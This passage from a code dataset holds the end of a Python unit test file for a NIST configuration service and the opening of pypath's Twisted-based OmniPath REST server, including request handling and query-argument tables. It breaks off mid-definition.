\"[0]\": \"ibb\",\n \"[3]\": \"ibe\"\n },\n \"[0]\": \"0a\",\n },\n \"[0]\": \"ic\",\n \"[3]\": \"id\"\n }\n }\n out = {\n \"a\": [ \"ic\", \"ia\", \"id\", {\n \"ib\": [ \"ibb\", \"ibe\" ],\n \"[0]\": \"0a\"\n }]\n }\n self.assertEqual(config.ConfigService._cvtarrays(d), out)\n\n def test_inflate(self):\n d = {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }\n out = {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n \"notifier\": {\n \"alerts\": [{\n \"type\": \"preserve.failure\",\n \"targets\": [ \"oarop\" ]\n }, {\n \"type\": \"preserve.success\",\n \"targets\": [ \"dev\" ]\n }]\n },\n \"sip_type\": {\n \"midas\": {\n \"common\": {\n \"review_dir\": \"/data/review\",\n \"upload_dir\": \"/data/upload\"\n }\n }\n }\n }\n self.assertEqual(config.ConfigService._inflate(d), out)\n\n def test_deep_update(self):\n d = {\n \"a\": {\n \"a.b\": 1,\n \"a.c\": 2,\n \"a.d\": {\n \"ad.a\": 4,\n \"ad.b\": 5\n }\n }\n }\n u = {\n \"a\": {\n \"a.c\": 20,\n \"a.d\": {\n \"ad.b\": 50,\n \"ad.c\": 60\n }\n }\n }\n out = {\n \"a\": {\n \"a.b\": 1,\n \"a.c\": 20,\n \"a.d\": {\n \"ad.a\": 4,\n \"ad.b\": 50,\n \"ad.c\": 60\n }\n }\n }\n n = config.ConfigService._deep_update(d, u)\n self.assertEqual(n, out)\n self.assertIs(n, d)\n\n def test_extract1(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"RMMAPI\": \"https://goob/rmm/\",\n \"LANDING\": \"https://localhost/rmm/\", \n \"SDPAPI\": \"https://localhost/sdp/\", \n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"RMMAPI\": \"https://localhost/rmm/\", \n \"SDPAPI\": \"https://localhost/sdp/\", \n }, \n \"hail\": \"fire\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n out = {\n \"RMMAPI\": \"https://goob/rmm/\",\n \"SDPAPI\": \"https://localhost/sdp/\", \n \"LANDING\": \"https://localhost/rmm/\", \n }\n\n self.assertEqual(config.ConfigService.extract(data), out)\n\n def test_extract2(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"store_dir\": \"/var/data/store\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }, \n \"name\": \"classpath:config/oar-uri/oar-uri-dev.yml\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n\n out = {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/var/data/store\",\n \"notifier\": {\n \"alerts\": [{\n \"type\": \"preserve.failure\",\n \"targets\": [ \"oarop\" ]\n }, {\n \"type\": \"preserve.win\",\n \"targets\": [ \"dev\", \"oarop\" ]\n }]\n },\n \"sip_type\": {\n \"midas\": {\n \"common\": {\n \"review_dir\": \"/var/data/review\",\n \"upload_dir\": \"/data/upload\"\n }\n }\n }\n }\n self.assertEqual(config.ConfigService.extract(data), out)\n\n def test_extract3(self):\n data = \\\n{\n \"propertySources\": [\n {\n \"source\": {\n \"store_dir\": \"/var/data/store\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n },\n \"name\": \"classpath:config/oar-uri/oar-uri.yml\"\n },\n {\n \"source\": {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }, \n \"name\": \"classpath:config/oar-uri/oar-uri-dev.yml\"\n }\n ], \n \"version\": None, \n \"name\": \"oaruri\", \n \"profiles\": [\n \"local\"\n ], \n \"label\": None\n}\n\n out = { \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/var/data/store\",\n 'notifier.alerts[1].type': \"preserve.win\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[1].targets[3]': \"oarop\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/var/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\" }\n\n self.assertEqual(config.ConfigService.extract(data, flat=True), out)\n \n\n @test.skipIf(\"noreload\" in os.environ.get(\"OAR_TEST_INCLUDE\", \"\"),\n \"Avoid reloading modules when part of larger TestSuite\")\n def test_defservice(self):\n self.assertNotIn('OAR_CONFIG_SERVICE', os.environ)\n self.assertIsNone(config.service)\n try:\n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n importlib.reload(config)\n self.assertIsNotNone(config.service)\n self.assertEqual(config.service._base, \"https://config.org/oar/\")\n self.assertIsNone(config.service._prof)\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n \n def test_defservice(self):\n self.assertNotIn('OAR_CONFIG_SERVICE', os.environ)\n self.assertIsNone(config.service)\n try:\n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n config.service = config.ConfigService.from_env()\n self.assertIsNotNone(config.service)\n self.assertEqual(config.service._base, \"https://config.org/oar/\")\n self.assertIsNone(config.service._prof)\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n config.service = None\n \n\n\nif __name__ == '__main__':\n test.main()\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/tests/nistoar/pdr/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":14391,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70278618989","text":"from future.utils import iteritems\n\nimport sys\nimport os\nimport re\nimport copy\nimport collections\nimport itertools\nimport hashlib\nimport warnings\nimport contextlib\n\nfrom pypath.share import session as session_mod\n\n_logger = session_mod.Logger(name = 'server')\n_log = _logger._log\n\ntry:\n import twisted.web.resource\n import twisted.web.server\n import twisted.internet.reactor\n TwistedWebResource = twisted.web.resource.Resource\n TwistedWebSite = twisted.web.server.Site\n TWISTED_NOT_DONE_YET = twisted.web.server.NOT_DONE_YET\n twisted_listen_tcp = twisted.internet.reactor.listenTCP\n twisted_run = twisted.internet.reactor.run\nexcept:\n _log('No module `twisted` available. Necessary to run HTTP server.', -1)\n class TwistedWebResource: pass\n class TwistedWebSite: pass\n TWISTED_NOT_DONE_YET = None\n twisted_listen_tcp = lambda: None\n twisted_run = lambda: None\n\nimport urllib\nimport json\nimport mimetypes\n\nimport pandas as pd\nimport numpy as np\n\nimport pypath.resources as resources\nfrom pypath.omnipath.server import generate_about_page\nimport pypath.omnipath.server._html as _html\nimport pypath.resources.urls as urls\nimport pypath.resources as resources_mod\nimport pypath.share.common as common\nimport pypath.share.constants as constants\nimport pypath.core.intercell_annot as intercell_annot\nimport pypath.share.settings as settings\nfrom pypath.share.common import flat_list\nfrom pypath._metadata import __version__\n\nif 'unicode' not in __builtins__:\n unicode = str\n\n\nLICENSE_IGNORE = 'ignore'\n\n\ndef stop_server():\n\n reactor.removeAll()\n\n\n@contextlib.contextmanager\ndef ignore_pandas_copywarn():\n\n try:\n\n with warnings.catch_warnings():\n\n warnings.simplefilter('ignore', pd.errors.SettingWithCopyWarning)\n\n yield\n\n finally:\n\n pass\n\n\nclass BaseServer(TwistedWebResource, session_mod.Logger):\n\n\n recomment = re.compile(b'')\n\n\n def __init__(self):\n\n if not hasattr(self, '_log_name'):\n\n session_mod.Logger.__init__(name = 'server')\n\n self._log('Initializing BaseServer.')\n\n self.htmls = ['info', 'error_page.html']\n self.welcome_message = (\n 'Hello, this is the REST service of pypath %s. Welcome!\\n'\n 'For the descriptions of pathway resources go to `/info`.\\n'\n 'Available query types: interactions, enz_sub, complexes, \\n'\n 'annotations, intercell'\n ) % __version__\n\n self.isLeaf = True\n self._set_www_root()\n self._read_license_secret()\n self._res_ctrl = resources_mod.get_controller()\n\n TwistedWebResource.__init__(self)\n self._log('Twisted resource initialized.')\n\n\n def render_GET(self, request):\n\n response = []\n\n request.postpath = [i.decode('utf-8') for i in request.postpath if i]\n\n self._log(\n 'Processing request: `%s` from `%s`; headers: [%s].' % (\n request.uri.decode('utf-8'),\n str(request.getClientAddress()),\n common.dict_str(request.getAllHeaders()),\n )\n )\n\n if not request.postpath:\n\n request.postpath = ['index.html']\n\n request.postpath[0] = self._query_type(request.postpath[0])\n\n self._set_headers(request)\n\n if (\n request.postpath and\n (\n hasattr(self, request.postpath[0]) or\n request.postpath[0] == 'error_page.html'\n ) and\n request.postpath[0][0] != '_'\n ):\n\n if request.postpath[0] == 'error_page.html':\n\n toCall = self._error_page\n\n else:\n\n self._process_postpath(request)\n toCall = getattr(self, request.postpath[0])\n\n if hasattr(toCall, '__call__'):\n\n self._log(\n 'Query type: `%s`; Arguments: [%s].' % (\n request.postpath[0],\n common.dict_str(request.args),\n )\n )\n\n try:\n\n response = toCall(request)\n response = (\n response.encode('utf-8')\n if hasattr(response, 'encode') else\n response\n )\n response = [response]\n\n except:\n\n self._log(\n 'Error while rendering `%s`:' %\n request.uri.decode('utf-8')\n )\n self._log_traceback()\n raise\n\n else:\n\n local_path = self._local_path(request)\n\n if local_path:\n\n with open(local_path, 'rb') as fp:\n\n response = [fp.read()]\n\n response = self._add_html_header(local_path, response)\n\n if not response:\n\n response = [\n (\n \"Not found: %s%s\" % (\n '/'.join(request.postpath),\n ''\n if len(request.args) == 0 else\n '?%s' %\n '&'.join([\n '%s=%s' % (\n k.decode('utf-8'),\n v[0].decode('utf-8')\n )\n for k, v in iteritems(request.args)\n if v\n ])\n )\n ).encode('utf-8')\n ]\n\n request.setHeader('Content-Length', str(len(response[0])))\n request.write(response[0])\n\n self._log(\n 'Finished serving request: `%s`.' % request.uri.decode('utf-8')\n )\n\n request.finish()\n\n return TWISTED_NOT_DONE_YET\n\n\n def render_POST(self, request):\n\n if (\n request.getHeader(b'content-type') and\n request.getHeader(b'content-type').startswith(b'application/json')\n ):\n\n post_content = request.content.getvalue()\n\n if post_content and post_content.strip():\n\n args_raw = json.loads(post_content)\n request.args = dict(\n (\n k.encode('utf-8'),\n [v.encode('utf-8')]\n if type(v) is not list else\n [','.join(v).encode('utf-8')]\n )\n for k, v in iteritems(args_raw)\n )\n\n return self.render_GET(request)\n\n\n def _set_www_root(self):\n\n self.wwwbuiltin = os.path.join(common.ROOT, 'data', 'www')\n self.wwwroot = settings.get('www_root')\n\n if not os.path.exists(self.wwwroot):\n\n self.wwwroot = self.wwwbuiltin\n\n\n def _local_path(self, request):\n\n if request.postpath and request.postpath[-1].startswith('_'):\n\n return\n\n for wwwroot in (self.wwwroot, self.wwwbuiltin):\n\n path = os.path.join(wwwroot, *request.postpath)\n\n if os.path.exists(path):\n\n return path\n\n\n def _set_headers(self, request):\n\n for k, v in iteritems(request.args):\n\n request.args[k] = [b','.join(v)]\n\n request.setHeader('Cache-Control', 'Public')\n request.setHeader('Access-Control-Allow-Origin', '*')\n\n if '' in request.postpath:\n\n request.postpath.remove('')\n\n if not request.postpath:\n\n request.postpath = ['index.html']\n\n if request.postpath and request.postpath[0] == 'resources':\n\n request.args[b'format'] = [b'json']\n\n local_path = self._local_path(request)\n\n if local_path:\n\n format_ = mimetypes.guess_type(local_path)[0]\n format_ = (\n tuple(format_.split('/'))\n if format_ else\n ('text', 'plain')\n )\n\n elif (\n not request.postpath or\n request.postpath[0] in self.htmls or\n request.postpath[0] == 'error_page.html'\n ):\n\n format_ = ('text', 'html')\n\n elif (\n b'format' in request.args and\n request.args[b'format'][0] == b'json'\n ):\n\n format_ = ('application', 'json')\n\n elif request.postpath[0] == 'favicon.ico':\n\n format_ = ('image', 'vnd.microsoft.icon')\n\n else:\n\n request.args[b'format'] = [b'text']\n format_ = ('text', 'plain')\n\n request.setHeader(\n 'Content-Type',\n '%s/%s%s' % (\n format_ + (\n '; charset=utf-8' if format_[0] == 'text' else '',\n )\n )\n )\n\n request.args[b'header'] = (\n [b'1']\n if b'header' not in request.args else\n request.args[b'header']\n )\n\n self._set_fields(request)\n self._set_license(request)\n\n\n def _set_fields(self, req):\n\n synonyms = (\n self.field_synonyms\n if hasattr(self, 'field_synonyms') else\n {}\n )\n\n if b'fields' in req.args:\n\n used = set()\n\n fields_checked = []\n\n for field in req.args[b'fields'][0].decode('utf-8').split(','):\n\n field = synonyms[field] if field in synonyms else field\n\n if field not in used:\n\n fields_checked.append(field)\n used.add(field)\n\n req.args[b'fields'] = [','.join(fields_checked).encode('utf-8')]\n\n else:\n\n req.args[b'fields'] = []\n\n\n def _set_license(self, req):\n\n query_type = req.postpath[0] if req.postpath else None\n query_type = self._query_type(query_type)\n\n if (\n not hasattr(self, 'args_reference') or\n not query_type or\n query_type not in self.args_reference or\n 'license' not in self.args_reference[query_type]\n ):\n\n return\n\n auth = False\n\n if b'password' in req.args:\n\n req_secret = hashlib.md5(req.args[b'password'][0]).hexdigest()\n\n auth = (\n self._license_secret is not None and\n self._license_secret == req_secret\n )\n\n # if someone sent a good password\n # why not to ignore the licenses\n if auth:\n\n req.args[b'license'] = [b'ignore']\n\n # if the license level is not set\n # or set to `ignore` but no successfull authentication\n # we fall back to the default license level\n if (\n b'license' not in req.args or (\n not auth and\n req.args[b'license'][0] == b'ignore'\n )\n ):\n\n req.args[b'license'] = self._default_license\n\n\n def _process_postpath(self, req):\n\n if len(req.postpath) > 1:\n\n ids_left = [req.postpath[1].encode('utf-8')]\n\n ids_right = (\n [req.postpath[2].encode('utf-8')]\n if (\n len(req.postpath) > 2 and\n req.postpath[2].lower() not in {'and', 'or'}\n ) else\n None\n )\n\n left_right = (\n [b'OR']\n if req.postpath[-1].lower() not in {'and', 'or'} else\n [req.postpath[-1].encode('utf-8')]\n )\n\n if ids_right:\n\n if req.postpath[0] == 'enzsub':\n\n req.args[b'enzymes'] = ids_left\n req.args[b'substrates'] = ids_right\n\n else:\n req.args[b'sources'] = ids_left\n req.args[b'targets'] = ids_right\n\n else:\n req.args[b'partners'] = ids_left\n\n if req.postpath[0] == 'enzsub':\n req.args[b'enzyme_substrate'] = left_right\n else:\n req.args[b'source_target'] = left_right\n\n\n def _query_type(self, query_type):\n\n return (\n self.query_type_synonyms[query_type]\n if (\n hasattr(self, 'query_type_synonyms') and\n query_type in self.query_type_synonyms\n ) else\n query_type\n )\n\n\n def _add_html_header(self, local_path, response):\n\n if (\n local_path.endswith('html') or\n local_path.endswith('htm')\n ) and not response[0].startswith(b''):\n\n head_foot = [\n (\n b'\\n\\n'\n b'%s\\n\\n'\n ),\n b'\\n',\n ]\n\n for wwwroot in (self.wwwroot, self.wwwbuiltin):\n\n for i, part in enumerate(('header', 'footer')):\n\n path = os.path.join(wwwroot, '_%s.html' % part)\n\n if os.path.exists(path):\n\n with open(path, 'rb') as fp:\n\n head_foot[i] = fp.read()\n\n if b'%s' in head_foot[0]:\n\n title = self.recomment.search(response[0])\n title = title.groups()[0] if title else b'pypath server'\n head_foot[0] = head_foot[0] % title.strip()\n\n response[0] = head_foot[0] + response[0] + head_foot[1]\n\n return response\n\n\n def about(self, req):\n\n return self.welcome_message\n\n\n def info(self, req):\n\n if (\n b'format' in req.args and\n req.args[b'format'][0] == b'json' and\n hasattr(self, 'resources')\n ):\n\n return self.resources(req)\n\n rc = resources.get_controller()\n rc.update()\n\n return generate_about_page.generate_about_html(rc.data)\n\n\n def _root(self, req):\n\n return _html.main_page()\n\n\n def _parse_arg(self, arg):\n\n if isinstance(arg, list) and arg:\n arg = arg[0]\n if hasattr(arg, 'decode'):\n arg = arg.decode('utf-8')\n if hasattr(arg, 'lower'):\n arg = arg.lower()\n if hasattr(arg, 'isdigit') and arg.isdigit():\n arg = int(arg)\n if arg in constants.BOOLEAN_FALSE:\n arg = False\n if arg in constants.BOOLEAN_TRUE:\n arg = True\n\n return bool(arg)\n\n\n def _read_license_secret(self):\n\n self._license_secret = None\n\n path = settings.get('license_secret')\n\n if os.path.exists(path):\n\n self._log('Reading license unlocking secret from `%s`.' % path)\n\n with open(path, 'r') as fp:\n\n self._license_secret = fp.read().strip()\n\n self._default_license = [\n settings.get('server_default_license').encode('ascii')\n ]\n\n\n def _error_page(self, req):\n\n req.setResponseCode(500)\n\n return _html.http_500()\n\n\nclass TableServer(BaseServer):\n\n query_types = {\n 'annotations',\n 'intercell',\n 'interactions',\n 'enz_sub',\n 'enzsub',\n 'ptms',\n 'complexes',\n 'about',\n 'info',\n 'queries',\n 'annotations_summary',\n 'intercell_summary',\n }\n data_query_types = {\n 'annotations',\n 'intercell',\n 'interactions',\n 'enzsub',\n 'complexes',\n }\n list_fields = {\n 'sources',\n 'references',\n 'isoforms',\n }\n\n int_list_fields = {\n 'references',\n 'isoforms',\n }\n\n field_synonyms = {\n 'organism': 'ncbi_tax_id',\n 'tfregulons_level': 'dorothea_level',\n 'tfregulons_curated': 'dorothea_curated',\n 'tfregulons_chipseq': 'dorothea_chipseq',\n 'tfregulons_tfbs': 'dorothea_tfbs',\n 'tfregulons_coexp': 'dorothea_coexp',\n 'sources': 'resources',\n 'databases': 'resources',\n }\n\n args_reference = {\n 'interactions': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table'\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'datasets': {\n 'omnipath',\n 'tfregulons',\n 'dorothea',\n 'collectri',\n 'tf_target',\n 'tf_mirna',\n 'lncrna_mrna',\n 'kinaseextra',\n 'ligrecextra',\n 'pathwayextra',\n 'mirnatarget',\n 'small_molecule',\n },\n 'types': {\n 'post_translational',\n 'transcriptional',\n 'post_transcriptional',\n 'mirna_transcriptional',\n 'lncrna_post_transcriptional',\n 'small_molecule_protein',\n },\n 'sources': None,\n 'resources': None,\n 'databases': None,\n 'targets': None,\n 'partners': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'evidences': None,\n 'extra_attrs': None,\n 'fields': {\n 'entity_type',\n 'references',\n 'sources',\n 'tfregulons_level',\n 'tfregulons_curated',\n 'tfregulons_chipseq',\n 'tfregulons_tfbs',\n 'tfregulons_coexp',\n 'dorothea_level',\n 'dorothea_curated',\n 'dorothea_chipseq',\n 'dorothea_tfbs',\n 'dorothea_coexp',\n 'type',\n 'ncbi_tax_id',\n 'databases',\n 'resources',\n 'organism',\n 'curation_effort',\n 'datasets',\n 'extra_attrs',\n 'evidences',\n },\n 'tfregulons_levels': {'A', 'B', 'C', 'D', 'E'},\n 'tfregulons_methods': {\n 'curated',\n 'chipseq',\n 'coexp',\n 'tfbs',\n },\n 'dorothea_levels': {'A', 'B', 'C', 'D', 'E'},\n 'dorothea_methods': {\n 'curated',\n 'chipseq',\n 'coexp',\n 'tfbs',\n },\n 'organisms': {\n '9606',\n '10090',\n '10116',\n },\n 'source_target': {\n 'AND',\n 'OR',\n 'and',\n 'or',\n },\n 'directed': constants.BOOLEAN_VALUES,\n 'signed': constants.BOOLEAN_VALUES,\n 'loops': constants.BOOLEAN_VALUES,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n },\n 'enzsub': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'enzymes': None,\n 'substrates': None,\n 'partners': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'organisms': {\n '9606',\n '10090',\n '10116',\n },\n 'databases': None,\n 'resources': None,\n 'residues': None,\n 'modification': None,\n 'types': None,\n 'fields': {\n 'sources',\n 'references',\n 'ncbi_tax_id',\n 'organism',\n 'databases',\n 'resources',\n 'isoforms',\n 'curation_effort',\n },\n 'enzyme_substrate': {\n 'AND',\n 'OR',\n 'and',\n 'or',\n }\n },\n 'annotations': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'databases': None,\n 'resources': None,\n 'proteins': None,\n 'fields': None,\n 'genesymbols': constants.BOOLEAN_VALUES,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n },\n 'annotations_summary': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'databases': None,\n 'resources': None,\n 'fields': None,\n 'cytoscape': constants.BOOLEAN_VALUES,\n },\n 'intercell': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'scope': {\n 'specific',\n 'generic',\n },\n 'aspect': {\n 'functional',\n 'locational',\n },\n 'source': {\n 'resource_specific',\n 'composite',\n },\n 'categories': None,\n 'databases': None,\n 'resources': None,\n 'parent': None,\n 'proteins': None,\n 'fields': None,\n 'entity_types': {\n 'protein',\n 'complex',\n 'mirna',\n 'lncrna',\n 'small_molecule',\n 'drug',\n 'metabolite',\n 'lipid',\n },\n 'transmitter': constants.BOOLEAN_VALUES,\n 'receiver': constants.BOOLEAN_VALUES,\n 'trans': constants.BOOLEAN_VALUES,\n 'rec': constants.BOOLEAN_VALUES,\n 'secreted': constants.BOOLEAN_VALUES,\n 'plasma_membrane_peripheral': constants.BOOLEAN_VALUES,\n 'plasma_membrane_transmembrane': constants.BOOLEAN_VALUES,\n 'sec': constants.BOOLEAN_VALUES,\n 'pmp': constants.BOOLEAN_VALUES,\n 'pmtm': constants.BOOLEAN_VALUES,\n 'causality': {\n 'transmitter',\n 'trans',\n 'receiver',\n 'rec',\n 'both'\n },\n 'topology': {\n 'secreted',\n 'sec',\n 'plasma_membrane_peripheral',\n 'pmp',\n 'plasma_membrane_transmembrane',\n 'pmtm',\n },\n },\n 'intercell_summary': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'scope': {\n 'specific',\n 'generic',\n },\n 'aspect': {\n 'functional',\n 'locational',\n },\n 'source': {\n 'resource_specific',\n 'generic',\n },\n 'categories': None,\n 'resources': None,\n 'databases': None,\n 'parent': None,\n 'fields': None,\n 'transmitter': constants.BOOLEAN_VALUES,\n 'receiver': constants.BOOLEAN_VALUES,\n 'trans': constants.BOOLEAN_VALUES,\n 'rec': constants.BOOLEAN_VALUES,\n 'secreted': constants.BOOLEAN_VALUES,\n 'plasma_membrane_peripheral': constants.BOOLEAN_VALUES,\n 'plasma_membrane_transmembrane': constants.BOOLEAN_VALUES,\n 'sec': constants.BOOLEAN_VALUES,\n 'pmp': constants.BOOLEAN_VALUES,\n 'pmtm': constants.BOOLEAN_VALUES,\n },\n 'complexes': {\n 'header': None,\n 'format': {\n 'json',\n 'tab',\n 'text',\n 'tsv',\n 'table',\n },\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'password': None,\n 'limit': None,\n 'databases': None,\n 'resources': None,\n 'proteins': None,\n 'fields': None,\n },\n 'resources': {\n 'license': {\n 'ignore',\n 'academic',\n 'non_profit',\n 'nonprofit',\n 'for_profit',\n 'forprofit',\n 'commercial',\n },\n 'format': {\n 'json',\n },\n 'datasets': {\n 'interactions',\n 'interaction',\n 'network',\n 'enzsub',\n 'enz_sub',\n 'enzyme-substrate',\n 'annotations',\n 'annotation',\n 'annot',\n 'intercell',\n 'complex',\n 'complexes',\n },\n 'subtypes': None,\n },\n 'queries': {\n 'format': {\n 'tab',\n 'text',\n 'tsv',\n 'table',\n 'json',\n },\n },\n }\n\n\n query_type_synonyms = {\n 'interactions': 'interactions',\n 'interaction': 'interactions',\n 'network': 'interactions',\n 'enz_sub': 'enzsub',\n 'enz-sub': 'enzsub',\n 'ptms': 'enzsub',\n 'ptm': 'enzsub',\n 'enzyme-substrate': 'enzsub',\n 'enzyme_substrate': 'enzsub',\n 'annotations': 'annotations',\n 'annotation': 'annotations',\n 'annot': 'annotations',\n 'intercell': 'intercell',\n 'intercellular': 'intercell',\n 'inter_cell': 'intercell',\n 'inter-cell': 'intercell',\n 'complex': 'complexes',\n 'complexes': 'complexes',\n }\n datasets_ = {\n 'omnipath',\n 'tfregulons',\n 'dorothea',\n 'collectri',\n 'tf_target',\n 'kinaseextra',\n 'ligrecextra',\n 'pathwayextra',\n 'mirnatarget',\n 'tf_mirna',\n 'lncrna_mrna',\n 'small_molecule',\n }\n dorothea_methods = {'curated', 'coexp', 'chipseq', 'tfbs'}\n dataset2type = {\n 'omnipath': 'post_translational',\n 'tfregulons': 'transcriptional',\n 'dorothea': 'transcriptional',\n 'collectri': 'transcriptional',\n 'tf_target': 'transcriptional',\n 'kinaseextra': 'post_translational',\n 'ligrecextra': 'post_translational',\n 'pathwayextra': 'post_translational',\n 'mirnatarget': 'post_transcriptional',\n 'tf_mirna': 'mirna_transcriptional',\n 'lncrna_mrna': 'lncrna_post_transcriptional',\n 'small_molecule': 'small_molecule_protein',\n }\n interaction_fields = {\n 'references', 'sources', 'dorothea_level',\n 'dorothea_curated', 'dorothea_chipseq',\n 'dorothea_tfbs', 'dorothea_coexp',\n 'tfregulons_level', 'tfregulons_curated',\n 'tfregulons_chipseq', 'tfregulons_tfbs', 'tfregulons_coexp',\n 'type', 'ncbi_tax_id', 'databases', 'organism',\n 'curation_effort', 'resources', 'entity_type',\n 'datasets', 'extra_attrs', 'evidences',\n }\n enzsub_fields = {\n 'references', 'sources', 'databases',\n 'isoforms', 'organism', 'ncbi_tax_id',\n 'curation_effort', 'resources',\n }\n default_input_files = {\n 'interactions': 'omnipath_webservice_interactions.tsv',\n 'enzsub': 'omnipath_webservice_enz_sub.tsv',\n 'annotations': 'omnipath_webservice_annotations.tsv',\n 'complexes': 'omnipath_webservice_complexes.tsv',\n 'intercell': 'omnipath_webservice_intercell.tsv',\n }\n default_dtypes = collections.defaultdict(\n dict,\n interactions = {\n 'source': 'category',\n 'target': 'category',\n 'source_genesymbol': 'category',\n 'target_genesymbol': 'category',\n 'is_directed': 'int8',\n 'is_stimulation': 'int8',\n 'is_inhibition': 'int8',\n 'consensus_direction': 'int8',\n 'consensus_stimulation': 'int8',\n 'consensus_inhibition': 'int8',\n 'sources': 'category',\n 'references': 'category',\n 'dorothea_curated': 'category',\n 'dorothea_chipseq': 'category',\n 'dorothea_tfbs': 'category',\n 'dorothea_coexp': 'category',\n 'dorothea_level': 'category',\n 'type': 'category',\n 'ncbi_tax_id_source': 'int16',\n 'ncbi_tax_id_target': 'int16',\n 'entity_type_source': 'category',\n 'entity_type_target': 'category',\n 'curation_effort': 'int16',\n 'extra_attrs': 'category',\n 'evidences': 'category',\n },\n annotations = {\n 'uniprot': 'category',\n 'genesymbol': 'category',\n 'entity_type': 'category',\n 'source': 'category',\n 'label': 'category',\n 'value': 'category',\n 'record_id': 'uint32',\n },\n enzsub = {\n 'enzyme': 'category',\n 'substrate': 'category',\n 'enzyme_genesymbol': 'category',\n 'substrate_genesymbol': 'category',\n 'isoforms': 'category',\n 'residue_type': 'category',\n 'residue_offset': 'uint16',\n 'modification': 'category',\n 'sources': 'category',\n 'references': 'category',\n 'ncbi_tax_id': 'int16',\n 'curation_effort': 'int32',\n },\n complexes = {\n 'name': 'category',\n 'stoichiometry': 'category',\n 'sources': 'category',\n 'references': 'category',\n 'identifiers': 'category',\n },\n intercell = {\n 'category': 'category',\n 'database': 'category',\n 'uniprot': 'category',\n 'genesymbol': 'category',\n 'parent': 'category',\n 'aspect': 'category',\n 'scope': 'category',\n 'source': 'category',\n 'entity_type': 'category',\n 'consensus_score': 'uint16',\n 'transmitter': 'bool',\n 'receiver': 